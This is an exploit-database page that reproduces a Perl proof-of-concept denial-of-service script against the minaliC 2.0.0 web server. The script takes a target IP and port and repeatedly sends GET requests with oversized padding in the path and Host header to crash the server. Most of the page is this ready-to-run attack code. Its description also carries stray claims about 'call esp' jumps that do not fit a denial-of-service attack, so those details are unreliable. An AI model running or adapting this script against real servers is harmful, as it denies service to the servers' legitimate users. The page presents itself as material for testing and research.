Advertisement






minaliC 2.0.0 Denied of Service

CVE Category Price Severity
CVE-2021-41110 CWE-400 $500 High
Author Risk Exploitation Type Date
Minalic High Remote 2024-03-24
CPE
cpe:/a:minalic:minalic:2.0.0
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030054

Below is a copy:

minaliC 2.0.0 Denied of Service
#!/usr/bin/perl


use Socket;

# Exploit Title: minaliC 2.0.0 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 03 january 2024
# Vendor Homepage: http://minalic.sourceforge.net/
# Notification vendor: No reported
# Tested Version: minaliC 2.0.0
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Vdeo: https://www.youtube.com/watch?v=R_gkEjvpJNw

#1. Description

#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server did not properly handle request with large amounts of data via method GET to web server.
#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){
      $cmd="cls";
    } else {
      $cmd="clear";
    }

    system("$cmd");
    
    intro();
    main();
    
    print "[+] Exploiting... \n";

my $junk = "\x41" x 245;

my $host = "\x41" x 135;
my $i=0;
while ($i <= 3) {
my $buf = "GET /" . $junk . " HTTP/1.1\r\n" . "Host: " . $host . "\r\n\r\n";

my $sock;
socket($sock, AF_INET, SOCK_STREAM, 0) or die "[-] Could not create socket: $!\n";

my $addr = sockaddr_in($port, inet_aton($ip));
connect($sock, $addr);

send($sock, $buf, length($buf), 0);

$i++;

}

    print "[+] Done - Exploited success!!!!!\n\n";
  
   sub intro {
      print "***************************************************\n";
      print "*       minaliC 2.0.0 - Denied of Service         *\n";
      print "*                                                 *\n";
      print "*            Coded by Fernando Mengali            *\n";
      print "*                                                 *\n";
      print "*      e-mail: fernando.mengalli\@gmail.com       *\n";
      print "*                                                 *\n";
      print "***************************************************\n";
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";
        exit(-1);

      }
  }

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum